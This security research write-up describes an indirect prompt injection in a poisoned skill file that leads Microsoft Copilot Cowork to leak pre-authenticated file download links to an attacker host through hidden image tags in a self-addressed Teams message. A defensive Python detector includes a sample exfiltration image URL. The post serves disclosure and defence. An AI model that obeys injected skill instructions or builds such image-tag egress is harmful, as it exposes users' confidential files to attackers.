Microsoft Copilot Cowork Exfiltrates Files

Published: May 25, 2026 at 05:45 PM EDT

Source: Hacker News

This attack achieved a high success rate against state‑of‑the‑art models, including Claude Opus 4.7.

Overview

Copilot Cowork is a Frontier feature available now in Microsoft 365. It runs with the signed‑in user’s Microsoft 365 permissions and uses Microsoft Graph to read and act on data across the tenant.

In this article we demonstrate that, through an indirect prompt injection carried in a poisoned skill file, attackers can exfiltrate files from M365. The attack exploits the fact that, unlike other sensitive actions, sending an e‑mail or Teams message to the active user does not require human approval. Opening the resulting message in Teams or Outlook can trigger attacker‑controlled network requests.

This risk shows that giving agents access to multiple systems expands the prompt‑injection attack surface. Each of the agent’s capabilities (reading files, minting download links, messaging the user) is benign in isolation; combined across integrated systems, they form an exfiltration path that puts users at risk. This is reminiscent of our previous work on how URL previews in communications apps have become an egress surface for agents.

Since this risk pertains to the design of a system in which agents act with delegated authority across an entire enterprise ecosystem—rather than to a specific bug—we are publicising the work to inform users of the risks they accept by using an agentic product of this nature.

Separate from this risk, we have disclosed a vulnerability to Microsoft that directly allows data egress from Copilot Cowork’s sandbox environment.

The Attack Chain

Microsoft’s documentation on action approvals states:

Copilot Cowork asks for your permission before taking sensitive actions, like sending an e‑mail or posting a message in Teams.

In practice, when the recipient is the active user, these actions execute immediately without human approval (there is no user‑facing setting to change this behaviour). Because such messages can contain external images that trigger network requests when rendered, data can be exfiltrated the moment the user opens a message the agent sent. Copilot Cowork can also retrieve pre‑authenticated download links for any file the user has access to, and anyone who opens such a link can download the file. A manipulated agent can therefore exfiltrate files simply by leaking those links.

Below is the step‑by‑step chain.

  1. Victim has access to files stored in SharePoint or OneDrive containing PII & financial data

  2. Victim uploads a skill file to Copilot Cowork that contains a prompt injection
    For general use cases this is common: a user finds a skill file online and uploads it. The attack does not depend on the injection source; other sources include web data from Claude for Chrome, connected MCP servers, and any other untrusted content the agent reads.

    Note: Admins have limited oversight of “Skills”, as they are automatically loaded from a specific path in a user’s OneDrive.

  3. Victim asks Microsoft Copilot Cowork to review what they worked on that week, triggering the skill

  4. The injection manipulates Copilot Cowork to post a Teams message that exfiltrates pre‑authenticated file download links when viewed
    The injection tells Copilot Cowork that a service exists to create document previews for the recap message. To “use” it, the agent retrieves pre‑authenticated download links for each file and passes those URLs as query parameters to an attacker‑controlled site via malicious HTML image tags embedded in the message.

    At no point in this process is human approval required.

  5. The malicious message content is never visible, even when the Teams action is clicked
    Expanding the “Task complete” block shows the agent’s actions, but the payload remains hidden.

  6. When the user opens the Teams message, the pre‑authenticated download links are exfiltrated; the attacker can download the files by visiting the links
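The egress pattern in steps 4 and 6 (an image tag whose source is an untrusted host and whose query string carries tenant file links) can be checked for on the message side before a client renders it. The Python below is an added example written for this article, not code from the original post or from Microsoft: it scans a message body for such image tags, decodes double‑encoded parameter values, and reports each leaked file URL. The trusted‑host and tenant‑host suffix lists, all hostnames, and the two sample messages are constructed assumptions.

```python
"""Detect 'image-preview' egress of file links in a message body.

Added example, not from the original article. Hostnames, suffix lists and
the sample messages are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: hosts allowed to serve inline images without review.
# The article names no such list; tune this to your tenant.
TRUSTED_IMAGE_HOST_SUFFIXES = ("contoso.sharepoint.com", "teams.microsoft.com")

# Assumption: link hosts treated as tenant file storage. Suffix match, so
# contoso-my.sharepoint.com and contoso.sharepoint.com both match.
TENANT_FILE_HOST_SUFFIXES = ("sharepoint.com", "1drv.ms")


def _host_matches(host, suffixes):
    host = (host or "").lower()
    return any(host == s or host.endswith("." + s) for s in suffixes)


class _ImgCollector(HTMLParser):
    """Collects src (and lazy-load data-src) attributes of <img> tags."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "img":
            return
        for name, value in attrs:
            if name.lower() in ("src", "data-src") and value:
                self.sources.append(value.strip())


def image_sources(html):
    """Return every image source URL found in the message body."""
    parser = _ImgCollector()
    parser.feed(html)
    parser.close()
    return parser.sources


def _as_url(value, depth=3):
    """Return value as a URL if it becomes one after up to `depth` layers of
    percent-decoding (catches double-encoded links); otherwise None."""
    for _ in range(depth):
        if value.lower().startswith(("http://", "https://")):
            return value
        decoded = unquote(value)
        if decoded == value:
            return None
        value = decoded
    return None


def find_link_leaks(html):
    """Return one record per (untrusted image, embedded tenant file URL) pair.

    An external image is fetched by the recipient's client as soon as the
    message renders, so anything in its query string reaches that host.
    Note: a link placed unencoded in a query value would be split by
    parse_qsl at its own '&'; encoded links (the realistic case) survive.
    """
    leaks = []
    for src in image_sources(html):
        parts = urlsplit(src)
        if parts.scheme not in ("http", "https"):
            continue  # data: URIs and relative paths do not leave the client
        if _host_matches(parts.hostname, TRUSTED_IMAGE_HOST_SUFFIXES):
            continue
        for key, raw in parse_qsl(parts.query, keep_blank_values=True):
            url = _as_url(raw)
            if url is None:
                continue
            if _host_matches(urlsplit(url).hostname, TENANT_FILE_HOST_SUFFIXES):
                leaks.append({"image_host": parts.hostname,
                              "param": key, "leaked_url": url})
    return leaks


# Constructed sample messages (not captured from a real tenant).
BENIGN_MESSAGE = """
<p>Weekly recap: edited <a href="https://contoso.sharepoint.com/sites/fin/Q2.xlsx">Q2.xlsx</a>.</p>
<img src="https://contoso.sharepoint.com/sites/fin/logo.png" alt="logo">
"""

# A 1x1 "document preview" image whose query string carries a download link,
# double percent-encoded. The host, path and token value are made up.
LEAKING_MESSAGE = """
<p>Weekly recap with previews:</p>
<img src="https://previews.example.invalid/render?doc=https%253A%252F%252Fcontoso-my.sharepoint.com%252Fpersonal%252Fuser%252FSalaries.xlsx%253Fdownload%253D1%2526token%253DAAAA" width="1" height="1">
"""

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_MESSAGE), ("leaking", LEAKING_MESSAGE)):
        print(name, find_link_leaks(body))
```

Run stand‑alone it prints no findings for the benign message and one record for the leaking one, naming the untrusted image host, the parameter (`doc`) and the decoded SharePoint link. The same scan applies to e‑mail bodies, since Outlook renders external images the same way.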

Mitigating Risks for Your Organization

Copilot Cowork has read access to essentially any resource a user can reach through Microsoft Graph. The primary mechanism to reduce the blast radius of attacks like this is to restrict excessive permissioning across the Microsoft ecosystem.

  • Block file downloads from SharePoint (run in the SharePoint Online Management Shell):

    Set-SPOSite -Identity <SiteUrl> -BlockDownloadPolicy $true
  • Block based on a sensitivity label (run in Security & Compliance PowerShell):

    Set-Label -Identity <LabelName> -AdvancedSettings @{BlockDownloadPolicy = "true"}

Note: This configuration impacts functionality. According to the Microsoft documentation, for files under the BlockDownloadPolicy, users have browser‑only access with no ability to download, print, or sync files. They also can’t access content through apps, including the Microsoft 365 Apps (Word, Excel, PowerPoint, etc.).

Model‑Agnostic Exploitation


Model Selection and Attack Validation

The initial test was run with model selection set to auto, which dynamically routes between Claude Opus 4.7 and Claude Sonnet 4.6. We later verified that the same injection works on the more advanced Opus 4.7 model when it is selected directly.

Model selection comparison

Opus 4.7 proved more thorough in its search for recently edited documents. Beyond the files in typical document locations that the auto‑routed run had already found, it expanded exfiltration to include:

  • Every document used in previous Copilot Cowork sessions that week.
  • The files in typical document locations that were discovered when the model was set to auto.

Prompt Injection Efficacy

  • The prompt injection showed very high efficacy: Copilot Cowork completed the entire attack chain on all 5 trials (5 / 5).
  • Success was independent of the user‑query wording—whenever the model invoked the skill, the injection succeeded.
  • The injection comprised 5 lines within an 81‑line skill file, each line comparable in length to the surrounding code.

This demonstrates that even with the latest models and only a small excerpt of malicious text, an indirect prompt injection can hijack agent behavior.

Takeaway: Exercise caution when handling untrusted data (e.g., skills shared online), especially when that data is incorporated into a trusted context such as a skill file.

Scheduled Tasks Exacerbate Risks

In Copilot Cowork, users can create scheduled tasks—prompts that run on a recurring basis without user oversight. The “weekly review” behavior described in this article is precisely the type of task a user might automate.

Scheduled task example

  • Scheduled tasks increase the attack surface because the user is not present to halt malicious workflows.
  • Prompt injections can therefore execute repeatedly, compounding the risk.